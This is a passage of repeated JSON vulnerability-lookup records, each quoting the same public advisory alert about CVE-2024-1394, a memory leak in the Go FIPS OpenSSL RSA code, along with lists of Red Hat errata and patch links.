https://access.redhat.com/errata/RHSA-2024:1501\n5. https://access.redhat.com/errata/RHSA-2024:1502\n6. https://access.redhat.com/errata/RHSA-2024:1561\n7. https://access.redhat.com/errata/RHSA-2024:1563\n8. https://access.redhat.com/errata/RHSA-2024:1566\n9. https://access.redhat.com/errata/RHSA-2024:1567\n10. https://access.redhat.com/errata/RHSA-2024:1574\n11. https://access.redhat.com/errata/RHSA-2024:1640\n12. https://access.redhat.com/errata/RHSA-2024:1644\n13. https://access.redhat.com/errata/RHSA-2024:1646\n14. https://access.redhat.com/errata/RHSA-2024:1763\n15. https://access.redhat.com/errata/RHSA-2024:1897\n16. https://access.redhat.com/errata/RHSA-2024:2562\n17. https://access.redhat.com/errata/RHSA-2024:2568\n18. https://access.redhat.com/errata/RHSA-2024:2569\n19. https://access.redhat.com/errata/RHSA-2024:2729\n20. https://access.redhat.com/errata/RHSA-2024:2730\n21. https://access.redhat.com/errata/RHSA-2024:2767\n22. https://access.redhat.com/errata/RHSA-2024:3265\n23. https://access.redhat.com/errata/RHSA-2024:3352\n24. https://access.redhat.com/errata/RHSA-2024:4146\n25. https://access.redhat.com/errata/RHSA-2024:4371\n26. https://access.redhat.com/errata/RHSA-2024:4378\n27. https://access.redhat.com/errata/RHSA-2024:4379\n28. https://access.redhat.com/errata/RHSA-2024:4502\n29. https://access.redhat.com/errata/RHSA-2024:4581\n30. https://access.redhat.com/errata/RHSA-2024:4591\n31. https://access.redhat.com/errata/RHSA-2024:4672\n32. https://access.redhat.com/errata/RHSA-2024:4699\n33. https://access.redhat.com/errata/RHSA-2024:4761\n34. https://access.redhat.com/errata/RHSA-2024:4762\n35. https://access.redhat.com/errata/RHSA-2024:4960\n36. https://access.redhat.com/errata/RHSA-2024:5258\n37. https://access.redhat.com/errata/RHSA-2024:5634\n38. https://access.redhat.com/errata/RHSA-2024:7262\n39. https://access.redhat.com/security/cve/CVE-2024-1394\n40. https://bugzilla.redhat.com/show_bug.cgi?id=2262921\n41. https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136\n42. https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6\n43. https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f\n44. https://pkg.go.dev/vuln/GO-2024-2660\n45. https://vuln.go.dev/ID/GO-2024-2660.json", "creation_timestamp": "2025-01-13T09:11:16.000000Z"}, {"uuid": "8b992b37-e0b6-4881-94b0-138714370cd4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:5258", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1356", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1394\n\ud83d\udd39 Description: A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs\u200b. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey\u200b and ctx\u200b. That function uses named return parameters to free pkey\u200b and ctx\u200b if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the \"return nil, nil, fail(...)\" pattern, meaning that pkey\u200b and ctx\u200b will be nil inside the deferred function that should free them.\n\ud83d\udccf Published: 2024-03-21T12:16:38.790Z\n\ud83d\udccf Modified: 2025-01-13T08:35:31.150Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1462\n2. https://access.redhat.com/errata/RHSA-2024:1468\n3. https://access.redhat.com/errata/RHSA-2024:1472\n4. https://access.redhat.com/errata/RHSA-2024:1501\n5. https://access.redhat.com/errata/RHSA-2024:1502\n6. https://access.redhat.com/errata/RHSA-2024:1561\n7. https://access.redhat.com/errata/RHSA-2024:1563\n8. https://access.redhat.com/errata/RHSA-2024:1566\n9. https://access.redhat.com/errata/RHSA-2024:1567\n10. https://access.redhat.com/errata/RHSA-2024:1574\n11. https://access.redhat.com/errata/RHSA-2024:1640\n12. https://access.redhat.com/errata/RHSA-2024:1644\n13. https://access.redhat.com/errata/RHSA-2024:1646\n14. https://access.redhat.com/errata/RHSA-2024:1763\n15. https://access.redhat.com/errata/RHSA-2024:1897\n16. https://access.redhat.com/errata/RHSA-2024:2562\n17. https://access.redhat.com/errata/RHSA-2024:2568\n18. https://access.redhat.com/errata/RHSA-2024:2569\n19. https://access.redhat.com/errata/RHSA-2024:2729\n20. https://access.redhat.com/errata/RHSA-2024:2730\n21. https://access.redhat.com/errata/RHSA-2024:2767\n22. https://access.redhat.com/errata/RHSA-2024:3265\n23. https://access.redhat.com/errata/RHSA-2024:3352\n24. https://access.redhat.com/errata/RHSA-2024:4146\n25. https://access.redhat.com/errata/RHSA-2024:4371\n26. https://access.redhat.com/errata/RHSA-2024:4378\n27. https://access.redhat.com/errata/RHSA-2024:4379\n28. https://access.redhat.com/errata/RHSA-2024:4502\n29. https://access.redhat.com/errata/RHSA-2024:4581\n30. https://access.redhat.com/errata/RHSA-2024:4591\n31. https://access.redhat.com/errata/RHSA-2024:4672\n32. https://access.redhat.com/errata/RHSA-2024:4699\n33. https://access.redhat.com/errata/RHSA-2024:4761\n34. https://access.redhat.com/errata/RHSA-2024:4762\n35. https://access.redhat.com/errata/RHSA-2024:4960\n36. https://access.redhat.com/errata/RHSA-2024:5258\n37. https://access.redhat.com/errata/RHSA-2024:5634\n38. https://access.redhat.com/errata/RHSA-2024:7262\n39. https://access.redhat.com/security/cve/CVE-2024-1394\n40. https://bugzilla.redhat.com/show_bug.cgi?id=2262921\n41. https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136\n42. https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6\n43. https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f\n44. https://pkg.go.dev/vuln/GO-2024-2660\n45. https://vuln.go.dev/ID/GO-2024-2660.json", "creation_timestamp": "2025-01-13T09:11:16.000000Z"}, {"uuid": "c503e001-3bc8-4fd6-9bd3-784979ff79ed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:4502", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1356", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1394\n\ud83d\udd39 Description: A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs\u200b. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey\u200b and ctx\u200b. That function uses named return parameters to free pkey\u200b and ctx\u200b if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the \"return nil, nil, fail(...)\" pattern, meaning that pkey\u200b and ctx\u200b will be nil inside the deferred function that should free them.\n\ud83d\udccf Published: 2024-03-21T12:16:38.790Z\n\ud83d\udccf Modified: 2025-01-13T08:35:31.150Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1462\n2. https://access.redhat.com/errata/RHSA-2024:1468\n3. https://access.redhat.com/errata/RHSA-2024:1472\n4. https://access.redhat.com/errata/RHSA-2024:1501\n5. https://access.redhat.com/errata/RHSA-2024:1502\n6. https://access.redhat.com/errata/RHSA-2024:1561\n7. https://access.redhat.com/errata/RHSA-2024:1563\n8. https://access.redhat.com/errata/RHSA-2024:1566\n9. https://access.redhat.com/errata/RHSA-2024:1567\n10. https://access.redhat.com/errata/RHSA-2024:1574\n11. https://access.redhat.com/errata/RHSA-2024:1640\n12. https://access.redhat.com/errata/RHSA-2024:1644\n13. https://access.redhat.com/errata/RHSA-2024:1646\n14. https://access.redhat.com/errata/RHSA-2024:1763\n15. https://access.redhat.com/errata/RHSA-2024:1897\n16. https://access.redhat.com/errata/RHSA-2024:2562\n17. https://access.redhat.com/errata/RHSA-2024:2568\n18. https://access.redhat.com/errata/RHSA-2024:2569\n19. https://access.redhat.com/errata/RHSA-2024:2729\n20. https://access.redhat.com/errata/RHSA-2024:2730\n21. https://access.redhat.com/errata/RHSA-2024:2767\n22. https://access.redhat.com/errata/RHSA-2024:3265\n23. https://access.redhat.com/errata/RHSA-2024:3352\n24. https://access.redhat.com/errata/RHSA-2024:4146\n25. https://access.redhat.com/errata/RHSA-2024:4371\n26. https://access.redhat.com/errata/RHSA-2024:4378\n27. https://access.redhat.com/errata/RHSA-2024:4379\n28. https://access.redhat.com/errata/RHSA-2024:4502\n29. https://access.redhat.com/errata/RHSA-2024:4581\n30. https://access.redhat.com/errata/RHSA-2024:4591\n31. https://access.redhat.com/errata/RHSA-2024:4672\n32. https://access.redhat.com/errata/RHSA-2024:4699\n33. https://access.redhat.com/errata/RHSA-2024:4761\n34. https://access.redhat.com/errata/RHSA-2024:4762\n35. https://access.redhat.com/errata/RHSA-2024:4960\n36. https://access.redhat.com/errata/RHSA-2024:5258\n37. https://access.redhat.com/errata/RHSA-2024:5634\n38. https://access.redhat.com/errata/RHSA-2024:7262\n39. https://access.redhat.com/security/cve/CVE-2024-1394\n40. https://bugzilla.redhat.com/show_bug.cgi?id=2262921\n41. https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136\n42. https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6\n43. https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f\n44. https://pkg.go.dev/vuln/GO-2024-2660\n45. https://vuln.go.dev/ID/GO-2024-2660.json", "creation_timestamp": "2025-01-13T09:11:16.000000Z"}, {"uuid": "733f9da5-b08a-430a-b5c0-8d2eca4ee14d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:2568", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1356", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1394\n\ud83d\udd39 Description: A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs\u200b. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey\u200b and ctx\u200b. That function uses named return parameters to free pkey\u200b and ctx\u200b if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the \"return nil, nil, fail(...)\" pattern, meaning that pkey\u200b and ctx\u200b will be nil inside the deferred function that should free them.\n\ud83d\udccf Published: 2024-03-21T12:16:38.790Z\n\ud83d\udccf Modified: 2025-01-13T08:35:31.150Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1462\n2. https://access.redhat.com/errata/RHSA-2024:1468\n3. https://access.redhat.com/errata/RHSA-2024:1472\n4. https://access.redhat.com/errata/RHSA-2024:1501\n5. https://access.redhat.com/errata/RHSA-2024:1502\n6. https://access.redhat.com/errata/RHSA-2024:1561\n7. https://access.redhat.com/errata/RHSA-2024:1563\n8. https://access.redhat.com/errata/RHSA-2024:1566\n9. https://access.redhat.com/errata/RHSA-2024:1567\n10. https://access.redhat.com/errata/RHSA-2024:1574\n11. https://access.redhat.com/errata/RHSA-2024:1640\n12. https://access.redhat.com/errata/RHSA-2024:1644\n13. https://access.redhat.com/errata/RHSA-2024:1646\n14. https://access.redhat.com/errata/RHSA-2024:1763\n15. https://access.redhat.com/errata/RHSA-2024:1897\n16. https://access.redhat.com/errata/RHSA-2024:2562\n17. https://access.redhat.com/errata/RHSA-2024:2568\n18. https://access.redhat.com/errata/RHSA-2024:2569\n19. https://access.redhat.com/errata/RHSA-2024:2729\n20. https://access.redhat.com/errata/RHSA-2024:2730\n21. https://access.redhat.com/errata/RHSA-2024:2767\n22. https://access.redhat.com/errata/RHSA-2024:3265\n23. https://access.redhat.com/errata/RHSA-2024:3352\n24. https://access.redhat.com/errata/RHSA-2024:4146\n25. https://access.redhat.com/errata/RHSA-2024:4371\n26. https://access.redhat.com/errata/RHSA-2024:4378\n27. https://access.redhat.com/errata/RHSA-2024:4379\n28. https://access.redhat.com/errata/RHSA-2024:4502\n29. https://access.redhat.com/errata/RHSA-2024:4581\n30. https://access.redhat.com/errata/RHSA-2024:4591\n31. https://access.redhat.com/errata/RHSA-2024:4672\n32. https://access.redhat.com/errata/RHSA-2024:4699\n33. https://access.redhat.com/errata/RHSA-2024:4761\n34. https://access.redhat.com/errata/RHSA-2024:4762\n35. https://access.redhat.com/errata/RHSA-2024:4960\n36. https://access.redhat.com/errata/RHSA-2024:5258\n37. https://access.redhat.com/errata/RHSA-2024:5634\n38. https://access.redhat.com/errata/RHSA-2024:7262\n39. https://access.redhat.com/security/cve/CVE-2024-1394\n40. https://bugzilla.redhat.com/show_bug.cgi?id=2262921\n41. https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136\n42. https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6\n43. https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f\n44. https://pkg.go.dev/vuln/GO-2024-2660\n45. https://vuln.go.dev/ID/GO-2024-2660.json", "creation_timestamp": "2025-01-13T09:11:16.000000Z"}, {"uuid": "1a432379-4a16-492f-b7ee-d3a5a2b4c3e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1501", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1356", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1394\n\ud83d\udd39 Description: A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs\u200b. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey\u200b and ctx\u200b. That function uses named return parameters to free pkey\u200b and ctx\u200b if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the \"return nil, nil, fail(...)\" pattern, meaning that pkey\u200b and ctx\u200b will be nil inside the deferred function that should free them.\n\ud83d\udccf Published: 2024-03-21T12:16:38.790Z\n\ud83d\udccf Modified: 2025-01-13T08:35:31.150Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1462\n2. https://access.redhat.com/errata/RHSA-2024:1468\n3. https://access.redhat.com/errata/RHSA-2024:1472\n4. https://access.redhat.com/errata/RHSA-2024:1501\n5. https://access.redhat.com/errata/RHSA-2024:1502\n6. https://access.redhat.com/errata/RHSA-2024:1561\n7. https://access.redhat.com/errata/RHSA-2024:1563\n8. https://access.redhat.com/errata/RHSA-2024:1566\n9. https://access.redhat.com/errata/RHSA-2024:1567\n10. https://access.redhat.com/errata/RHSA-2024:1574\n11. https://access.redhat.com/errata/RHSA-2024:1640\n12. https://access.redhat.com/errata/RHSA-2024:1644\n13. https://access.redhat.com/errata/RHSA-2024:1646\n14. https://access.redhat.com/errata/RHSA-2024:1763\n15. https://access.redhat.com/errata/RHSA-2024:1897\n16. https://access.redhat.com/errata/RHSA-2024:2562\n17. https://access.redhat.com/errata/RHSA-2024:2568\n18. https://access.redhat.com/errata/RHSA-2024:2569\n19. https://access.redhat.com/errata/RHSA-2024:2729\n20. https://access.redhat.com/errata/RHSA-2024:2730\n21. https://access.redhat.com/errata/RHSA-2024:2767\n22. https://access.redhat.com/errata/RHSA-2024:3265\n23. https://access.redhat.com/errata/RHSA-2024:3352\n24. https://access.redhat.com/errata/RHSA-2024:4146\n25. https://access.redhat.com/errata/RHSA-2024:4371\n26. https://access.redhat.com/errata/RHSA-2024:4378\n27. https://access.redhat.com/errata/RHSA-2024:4379\n28. https://access.redhat.com/errata/RHSA-2024:4502\n29. https://access.redhat.com/errata/RHSA-2024:4581\n30. https://access.redhat.com/errata/RHSA-2024:4591\n31. https://access.redhat.com/errata/RHSA-2024:4672\n32. https://access.redhat.com/errata/RHSA-2024:4699\n33. https://access.redhat.com/errata/RHSA-2024:4761\n34. https://access.redhat.com/errata/RHSA-2024:4762\n35. https://access.redhat.com/errata/RHSA-2024:4960\n36. https://access.redhat.com/errata/RHSA-2024:5258\n37. https://access.redhat.com/errata/RHSA-2024:5634\n38. https://access.redhat.com/errata/RHSA-2024:7262\n39. https://access.redhat.com/security/cve/CVE-2024-1394\n40. https://bugzilla.redhat.com/show_bug.cgi?id=2262921\n41. https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136\n42. https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6\n43. https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f\n44. https://pkg.go.dev/vuln/GO-2024-2660\n45. https://vuln.go.dev/ID/GO-2024-2660.json", "creation_timestamp": "2025-01-13T09:11:16.000000Z"}, {"uuid": "0d72e6a8-afcb-4011-ac90-1cdc4d08b60e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:5634", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1356", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1394\n\ud83d\udd39 Description: A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs\u200b. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey\u200b and ctx\u200b. That function uses named return parameters to free pkey\u200b and ctx\u200b if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the \"return nil, nil, fail(...)\" pattern, meaning that pkey\u200b and ctx\u200b will be nil inside the deferred function that should free them.\n\ud83d\udccf Published: 2024-03-21T12:16:38.790Z\n\ud83d\udccf Modified: 2025-01-13T08:35:31.150Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1462\n2. https://access.redhat.com/errata/RHSA-2024:1468\n3. https://access.redhat.com/errata/RHSA-2024:1472\n4. https://access.redhat.com/errata/RHSA-2024:1501\n5. https://access.redhat.com/errata/RHSA-2024:1502\n6. https://access.redhat.com/errata/RHSA-2024:1561\n7. https://access.redhat.com/errata/RHSA-2024:1563\n8. https://access.redhat.com/errata/RHSA-2024:1566\n9. https://access.redhat.com/errata/RHSA-2024:1567\n10. https://access.redhat.com/errata/RHSA-2024:1574\n11. https://access.redhat.com/errata/RHSA-2024:1640\n12. https://access.redhat.com/errata/RHSA-2024:1644\n13. https://access.redhat.com/errata/RHSA-2024:1646\n14. https://access.redhat.com/errata/RHSA-2024:1763\n15. https://access.redhat.com/errata/RHSA-2024:1897\n16. https://access.redhat.com/errata/RHSA-2024:2562\n17. https://access.redhat.com/errata/RHSA-2024:2568\n18. https://access.redhat.com/errata/RHSA-2024:2569\n19. https://access.redhat.com/errata/RHSA-2024:2729\n20. https://access.redhat.com/errata/RHSA-2024:2730\n21. https://access.redhat.com/errata/RHSA-2024:2767\n22. https://access.redhat.com/errata/RHSA-2024:3265\n23. https://access.redhat.com/errata/RHSA-2024:3352\n24. https://access.redhat.com/errata/RHSA-2024:4146\n25. https://access.redhat.com/errata/RHSA-2024:4371\n26. https://access.redhat.com/errata/RHSA-2024:4378\n27. https://access.redhat.com/errata/RHSA-2024:4379\n28. https://access.redhat.com/errata/RHSA-2024:4502\n29. https://access.redhat.com/errata/RHSA-2024:4581\n30. https://access.redhat.com/errata/RHSA-2024:4591\n31. https://access.redhat.com/errata/RHSA-2024:4672\n32. https://access.redhat.com/errata/RHSA-2024:4699\n33. https://access.redhat.com/errata/RHSA-2024:4761\n34. https://access.redhat.com/errata/RHSA-2024:4762\n35. https://access.redhat.com/errata/RHSA-2024:4960\n36. https://access.redhat.com/errata/RHSA-2024:5258\n37. https://access.redhat.com/errata/RHSA-2024:5634\n38. https://access.redhat.com/errata/RHSA-2024:7262\n39. https://access.redhat.com/security/cve/CVE-2024-1394\n40. https://bugzilla.redhat.com/show_bug.cgi?id=2262921\n41. https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136\n42. https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6\n43. https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f\n44. https://pkg.go.dev/vuln/GO-2024-2660\n45. https://vuln.go.dev/ID/GO-2024-2660.json", "creation_timestamp": "2025-01-13T09:11:16.000000Z"}, {"uuid": "4d006055-a5c0-4259-a80f-4aa3c649d595", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:4379", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1356", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1394\n\ud83d\udd39 Description: A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs\u200b. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey\u200b and ctx\u200b. That function uses named return parameters to free pkey\u200b and ctx\u200b if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the \"return nil, nil, fail(...)\" pattern, meaning that pkey\u200b and ctx\u200b will be nil inside the deferred function that should free them.\n\ud83d\udccf Published: 2024-03-21T12:16:38.790Z\n\ud83d\udccf Modified: 2025-01-13T08:35:31.150Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1462\n2. https://access.redhat.com/errata/RHSA-2024:1468\n3. https://access.redhat.com/errata/RHSA-2024:1472\n4. https://access.redhat.com/errata/RHSA-2024:1501\n5. https://access.redhat.com/errata/RHSA-2024:1502\n6. https://access.redhat.com/errata/RHSA-2024:1561\n7. https://access.redhat.com/errata/RHSA-2024:1563\n8. https://access.redhat.com/errata/RHSA-2024:1566\n9. https://access.redhat.com/errata/RHSA-2024:1567\n10. https://access.redhat.com/errata/RHSA-2024:1574\n11. https://access.redhat.com/errata/RHSA-2024:1640\n12. https://access.redhat.com/errata/RHSA-2024:1644\n13. https://access.redhat.com/errata/RHSA-2024:1646\n14. https://access.redhat.com/errata/RHSA-2024:1763\n15. https://access.redhat.com/errata/RHSA-2024:1897\n16. https://access.redhat.com/errata/RHSA-2024:2562\n17. https://access.redhat.com/errata/RHSA-2024:2568\n18. https://access.redhat.com/errata/RHSA-2024:2569\n19. https://access.redhat.com/errata/RHSA-2024:2729\n20. https://access.redhat.com/errata/RHSA-2024:2730\n21. https://access.redhat.com/errata/RHSA-2024:2767\n22. https://access.redhat.com/errata/RHSA-2024:3265\n23. https://access.redhat.com/errata/RHSA-2024:3352\n24. https://access.redhat.com/errata/RHSA-2024:4146\n25. https://access.redhat.com/errata/RHSA-2024:4371\n26. https://access.redhat.com/errata/RHSA-2024:4378\n27. https://access.redhat.com/errata/RHSA-2024:4379\n28. https://access.redhat.com/errata/RHSA-2024:4502\n29. https://access.redhat.com/errata/RHSA-2024:4581\n30. https://access.redhat.com/errata/RHSA-2024:4591\n31. https://access.redhat.com/errata/RHSA-2024:4672\n32. https://access.redhat.com/errata/RHSA-2024:4699\n33. https://access.redhat.com/errata/RHSA-2024:4761\n34. https://access.redhat.com/errata/RHSA-2024:4762\n35. https://access.redhat.com/errata/RHSA-2024:4960\n36. https://access.redhat.com/errata/RHSA-2024:5258\n37. https://access.redhat.com/errata/RHSA-2024:5634\n38. https://access.redhat.com/errata/RHSA-2024:7262\n39. https://access.redhat.com/security/cve/CVE-2024-1394\n40. https://bugzilla.redhat.com/show_bug.cgi?id=2262921\n41. https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136\n42. https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6\n43. https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f\n44. https://pkg.go.dev/vuln/GO-2024-2660\n45. https://vuln.go.dev/ID/GO-2024-2660.json", "creation_timestamp": "2025-01-13T09:11:16.000000Z"}, {"uuid": "d283a571-01c5-493a-a7c4-714f17e270eb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:4146", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1356", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1394\n\ud83d\udd39 Description: A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs\u200b. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey\u200b and ctx\u200b. That function uses named return parameters to free pkey\u200b and ctx\u200b if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the \"return nil, nil, fail(...)\" pattern, meaning that pkey\u200b and ctx\u200b will be nil inside the deferred function that should free them.\n\ud83d\udccf Published: 2024-03-21T12:16:38.790Z\n\ud83d\udccf Modified: 2025-01-13T08:35:31.150Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1462\n2. https://access.redhat.com/errata/RHSA-2024:1468\n3. https://access.redhat.com/errata/RHSA-2024:1472\n4. https://access.redhat.com/errata/RHSA-2024:1501\n5. https://access.redhat.com/errata/RHSA-2024:1502\n6. https://access.redhat.com/errata/RHSA-2024:1561\n7. https://access.redhat.com/errata/RHSA-2024:1563\n8. https://access.redhat.com/errata/RHSA-2024:1566\n9. https://access.redhat.com/errata/RHSA-2024:1567\n10. https://access.redhat.com/errata/RHSA-2024:1574\n11. https://access.redhat.com/errata/RHSA-2024:1640\n12. https://access.redhat.com/errata/RHSA-2024:1644\n13. https://access.redhat.com/errata/RHSA-2024:1646\n14. https://access.redhat.com/errata/RHSA-2024:1763\n15. https://access.redhat.com/errata/RHSA-2024:1897\n16. https://access.redhat.com/errata/RHSA-2024:2562\n17. https://access.redhat.com/errata/RHSA-2024:2568\n18. https://access.redhat.com/errata/RHSA-2024:2569\n19. https://access.redhat.com/errata/RHSA-2024:2729\n20. https://access.redhat.com/errata/RHSA-2024:2730\n21. https://access.redhat.com/errata/RHSA-2024:2767\n22. https://access.redhat.com/errata/RHSA-2024:3265\n23. https://access.redhat.com/errata/RHSA-2024:3352\n24. https://access.redhat.com/errata/RHSA-2024:4146\n25. https://access.redhat.com/errata/RHSA-2024:4371\n26. https://access.redhat.com/errata/RHSA-2024:4378\n27. https://access.redhat.com/errata/RHSA-2024:4379\n28. https://access.redhat.com/errata/RHSA-2024:4502\n29. https://access.redhat.com/errata/RHSA-2024:4581\n30. https://access.redhat.com/errata/RHSA-2024:4591\n31. https://access.redhat.com/errata/RHSA-2024:4672\n32. https://access.redhat.com/errata/RHSA-2024:4699\n33. https://access.redhat.com/errata/RHSA-2024:4761\n34. https://access.redhat.com/errata/RHSA-2024:4762\n35. https://access.redhat.com/errata/RHSA-2024:4960\n36. https://access.redhat.com/errata/RHSA-2024:5258\n37. https://access.redhat.com/errata/RHSA-2024:5634\n38. https://access.redhat.com/errata/RHSA-2024:7262\n39. https://access.redhat.com/security/cve/CVE-2024-1394\n40. https://bugzilla.redhat.com/show_bug.cgi?id=2262921\n41. https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136\n42. https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6\n43. https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f\n44. https://pkg.go.dev/vuln/GO-2024-2660\n45. https://vuln.go.dev/ID/GO-2024-2660.json", "creation_timestamp": "2025-01-13T09:11:16.000000Z"}, {"uuid": "0fee0bc6-4768-4292-b7a6-c653fd8a5e37", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1567", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1356", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1394\n\ud83d\udd39 Description: A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs\u200b. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey\u200b and ctx\u200b. That function uses named return parameters to free pkey\u200b and ctx\u200b if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the \"return nil, nil, fail(...)\" pattern, meaning that pkey\u200b and ctx\u200b will be nil inside the deferred function that should free them.\n\ud83d\udccf Published: 2024-03-21T12:16:38.790Z\n\ud83d\udccf Modified: 2025-01-13T08:35:31.150Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1462\n2. https://access.redhat.com/errata/RHSA-2024:1468\n3. https://access.redhat.com/errata/RHSA-2024:1472\n4. 